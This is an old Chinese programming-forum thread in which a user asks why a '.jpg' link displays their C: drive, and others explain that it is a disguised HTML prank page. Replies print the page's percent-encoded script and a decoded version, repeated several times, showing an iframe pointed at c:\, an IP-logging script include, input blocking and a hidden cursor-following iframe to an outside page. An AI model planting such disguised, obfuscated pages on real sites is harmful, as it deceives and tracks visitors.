9,506
社区成员
发帖
与我相关
我的任务
分享请教:http://www.haha168.com/pages/018/hacked.jpg
这个jpg有什么名堂?为何能显示我的C盘内容?
...全文
请发表友善的回复…
发表回复
Amountain 2003-08-05
- 打赏
- 举报
高手
zhllwarez 2003-08-04
- 打赏
- 举报
我自己写了个解码程序,以下是该页的全部代码解码,我解的可能有些错误,但是不影响阅读,大致能了解什么意思。
<html>
<head>
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>IHackedYou-----『八目妖爆笑娱乐城』http://www.haha168.com</title>
</head>
<script>
<!--
document.write(unescape("<script>
<!--
document.write(unescape("<body bgcolor="#FFFFFF" text="#000000" onload="crap.style.display=''" onmousedown="return false" onmousemove="return false" ondragstart="return false" onselec="return false" onselectstart="return false" style='overflow:hidden'>
<div id="crap" style='display:none'>
<img src="ihackedyou.jpg" width="647" height="553">
<div style='width:520;height:380;position:absolute;left:118;top:170'>
<iframe src="c:\" width="520" height="380" style="z-Index:1"></iframe>
<!--注意上面这个iframe, 就是它搞得鬼-->
</div>"));
//-->
</script>"));
//-->
</script>
<script>
<!--
document.write(unescape("<script>
<!--
document.write(unescape("<div id='hehe' style='font-family:MS Sans Serif;font-size:15px;position:absolute;top:56px;left:155px'>
<script src="ipget.asp">"));
//-->
</script>"));
//-->
</script></script>
</div>
<script>
<!--
document.write(unescape("<script>
<!--
document.write(unescape("</div>
<div id="mouse" style='position:absolute;top:0;left:0;height:3;width:2;z-Index:100000;overflow:hidden'><iframe src='d9pd.51.net.htm' width=100 height=100 frameborder=0 scrolling=no></iframe></div>
<div id="up" onresize="c()"></div>
<script language="javascript">
function c(){
mouse.style.left = event.x-2
mouse.style.top = event.y-3
}
setInterval("up.style.width=Math.round(Math.random()*10)",1)
</script>
</body>
</html>
<html>
<head>
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>IHackedYou-----『八目妖爆笑娱乐城』http://www.haha168.com</title>
</head>
<script>
<!--
document.write(unescape("<script>
<!--
document.write(unescape("<body bgcolor="#FFFFFF" text="#000000" onload="crap.style.display=''" onmousedown="return false" onmousemove="return false" ondragstart="return false" onselec="return false" onselectstart="return false" style='overflow:hidden'>
<div id="crap" style='display:none'>
<img src="ihackedyou.jpg" width="647" height="553">
<div style='width:520;height:380;position:absolute;left:118;top:170'>
<iframe src="c:\" width="520" height="380" style="z-Index:1"></iframe>
<!--注意上面这个iframe, 就是它搞得鬼-->
</div>"));
//-->
</script>"));
//-->
</script>
<script>
<!--
document.write(unescape("<script>
<!--
document.write(unescape("<div id='hehe' style='font-family:MS Sans Serif;font-size:15px;position:absolute;top:56px;left:155px'>
<script src="ipget.asp">"));
//-->
</script>"));
//-->
</script></script>
</div>
<script>
<!--
document.write(unescape("<script>
<!--
document.write(unescape("</div>
<div id="mouse" style='position:absolute;top:0;left:0;height:3;width:2;z-Index:100000;overflow:hidden'><iframe src='d9pd.51.net.htm' width=100 height=100 frameborder=0 scrolling=no></iframe></div>
<div id="up" onresize="c()"></div>
<script language="javascript">
function c(){
mouse.style.left = event.x-2
mouse.style.top = event.y-3
}
setInterval("up.style.width=Math.round(Math.random()*10)",1)
</script>
</body>
</html>
zhllwarez 2003-08-04
- 打赏
- 举报
我自己把这个页面进行了解码,里面有些错误,但大致还能够看懂什么意思。
全部东西解码如下:
<html>
<head>
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>IHackedYou-----『八目妖爆笑娱乐城』http://www.haha168.com</title>
</head>
<script>
<!--
document.write(unescape("<script>
<!--
document.write(unescape("<body bgcolor="#FFFFFF" text="#000000" onload="crap.style.display=''" onmousedown="return false" onmousemove="return false" ondragstart="return false" onselec="return false" onselectstart="return false" style='overflow:hidden'>
<div id="crap" style='display:none'>
<img src="ihackedyou.jpg" width="647" height="553">
<div style='width:520;height:380;position:absolute;left:118;top:170'>
<iframe src="c:\" width="520" height="380" style="z-Index:1"></iframe>
<!--注意上面这个iframe,关键就是这个东西搞得鬼-->
</div>"));
//-->
</script>"));
//-->
</script>
<script>
<!--
document.write(unescape("<script>
<!--
document.write(unescape("<div id='hehe' style='font-family:MS Sans Serif;font-size:15px;position:absolute;top:56px;left:155px'>
<script src="ipget.asp">"));
//-->
</script>"));
//-->
</script></script>
</div>
<script>
<!--
document.write(unescape("<script>
<!--
document.write(unescape("</div>
<div id="mouse" style='position:absolute;top:0;left:0;height:3;width:2;z-Index:100000;overflow:hidden'><iframe src='d9pd.51.net.htm' width=100 height=100 frameborder=0 scrolling=no></iframe></div>
<div id="up" onresize="c()"></div>
<script language="javascript">
function c(){
mouse.style.left = event.x-2
mouse.style.top = event.y-3
}
setInterval("up.style.width=Math.round(Math.random()*10)",1)
</script>
</body>
</html>
全部东西解码如下:
<html>
<head>
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>IHackedYou-----『八目妖爆笑娱乐城』http://www.haha168.com</title>
</head>
<script>
<!--
document.write(unescape("<script>
<!--
document.write(unescape("<body bgcolor="#FFFFFF" text="#000000" onload="crap.style.display=''" onmousedown="return false" onmousemove="return false" ondragstart="return false" onselec="return false" onselectstart="return false" style='overflow:hidden'>
<div id="crap" style='display:none'>
<img src="ihackedyou.jpg" width="647" height="553">
<div style='width:520;height:380;position:absolute;left:118;top:170'>
<iframe src="c:\" width="520" height="380" style="z-Index:1"></iframe>
<!--注意上面这个iframe,关键就是这个东西搞得鬼-->
</div>"));
//-->
</script>"));
//-->
</script>
<script>
<!--
document.write(unescape("<script>
<!--
document.write(unescape("<div id='hehe' style='font-family:MS Sans Serif;font-size:15px;position:absolute;top:56px;left:155px'>
<script src="ipget.asp">"));
//-->
</script>"));
//-->
</script></script>
</div>
<script>
<!--
document.write(unescape("<script>
<!--
document.write(unescape("</div>
<div id="mouse" style='position:absolute;top:0;left:0;height:3;width:2;z-Index:100000;overflow:hidden'><iframe src='d9pd.51.net.htm' width=100 height=100 frameborder=0 scrolling=no></iframe></div>
<div id="up" onresize="c()"></div>
<script language="javascript">
function c(){
mouse.style.left = event.x-2
mouse.style.top = event.y-3
}
setInterval("up.style.width=Math.round(Math.random()*10)",1)
</script>
</body>
</html>
感谢各位 2003-08-04
- 打赏
- 举报
1、我也去了
2、他得到了我的ip,大家全可以得到
3、现在他在getting data ……
4、也许是朋友们为了开个玩笑
5、居然还在getting data ……,时间有点长
6、虽说微软的东西如何,补丁还是要打
2、他得到了我的ip,大家全可以得到
3、现在他在getting data ……
4、也许是朋友们为了开个玩笑
5、居然还在getting data ……,时间有点长
6、虽说微软的东西如何,补丁还是要打
zhllwarez 2003-08-04
- 打赏
- 举报
我去看了看,这个东西利用了微软可以解析jpg后缀的html文件的漏洞。这个jpg实际是一个html文件,你可以看源代码,他使用了一个iframe来显示你的本地硬盘内容,如果你懂点html语言你就知道这个效果很好实现的。总体来说这个页面没有什么危害。
关键代码如下(它用unescape函数解码,详细信息请自己查阅参考资料),注意里面的iframe标签
<script>
<!--
document.write(unescape("%3Cscript%3E%0D%0A%3C%21--%0D%0Adocument.write%28unescape%28%22%253Cbody%2520bgcolor%253D%2522%2523FFFFFF%2522%2520text%253D%2522%2523000000%2522%2520onload%253D%2522crap.style.display%253D%2527%2527%2522%2520onmousedown%253D%2522return%2520false%2522%2520onmousemove%253D%2522return%2520false%2522%2520ondragstart%253D%2522return%2520false%2522%2520onselec%253D%2522return%2520false%2522%2520onselectstart%253D%2522return%2520false%2522%2520style%253D%2527overflow%253Ahidden%2527%253E%250D%250A%253Cdiv%2520id%253D%2522crap%2522%2520style%253D%2527display%253Anone%2527%253E%250D%250A%253Cimg%2520src%253D%2522ihackedyou.jpg%2522%2520width%253D%2522647%2522%2520height%253D%2522553%2522%253E%250D%250A%253Cdiv%2520style%253D%2527width%253A520%253Bheight%253A380%253Bposition%253Aabsolute%253Bleft%253A118%253Btop%253A170%2527%253E%250D%250A%253Ciframe%2520src%253D%2522c%253A%255C%2522%2520width%253D%2522520%2522%2520height%253D%2522380%2522%2520style%253D%2522z-Index%253A1%2522%253E%253C/iframe%253E%250D%250A%253C/div%253E%22%29%29%3B%0D%0A//--%3E%0D%0A%3C/script%3E"));
//-->
</script>
关键代码如下(它用unescape函数解码,详细信息请自己查阅参考资料),注意里面的iframe标签
<script>
<!--
document.write(unescape("%3Cscript%3E%0D%0A%3C%21--%0D%0Adocument.write%28unescape%28%22%253Cbody%2520bgcolor%253D%2522%2523FFFFFF%2522%2520text%253D%2522%2523000000%2522%2520onload%253D%2522crap.style.display%253D%2527%2527%2522%2520onmousedown%253D%2522return%2520false%2522%2520onmousemove%253D%2522return%2520false%2522%2520ondragstart%253D%2522return%2520false%2522%2520onselec%253D%2522return%2520false%2522%2520onselectstart%253D%2522return%2520false%2522%2520style%253D%2527overflow%253Ahidden%2527%253E%250D%250A%253Cdiv%2520id%253D%2522crap%2522%2520style%253D%2527display%253Anone%2527%253E%250D%250A%253Cimg%2520src%253D%2522ihackedyou.jpg%2522%2520width%253D%2522647%2522%2520height%253D%2522553%2522%253E%250D%250A%253Cdiv%2520style%253D%2527width%253A520%253Bheight%253A380%253Bposition%253Aabsolute%253Bleft%253A118%253Btop%253A170%2527%253E%250D%250A%253Ciframe%2520src%253D%2522c%253A%255C%2522%2520width%253D%2522520%2522%2520height%253D%2522380%2522%2520style%253D%2522z-Index%253A1%2522%253E%253C/iframe%253E%250D%250A%253C/div%253E%22%29%29%3B%0D%0A//--%3E%0D%0A%3C/script%3E"));
//-->
</script>
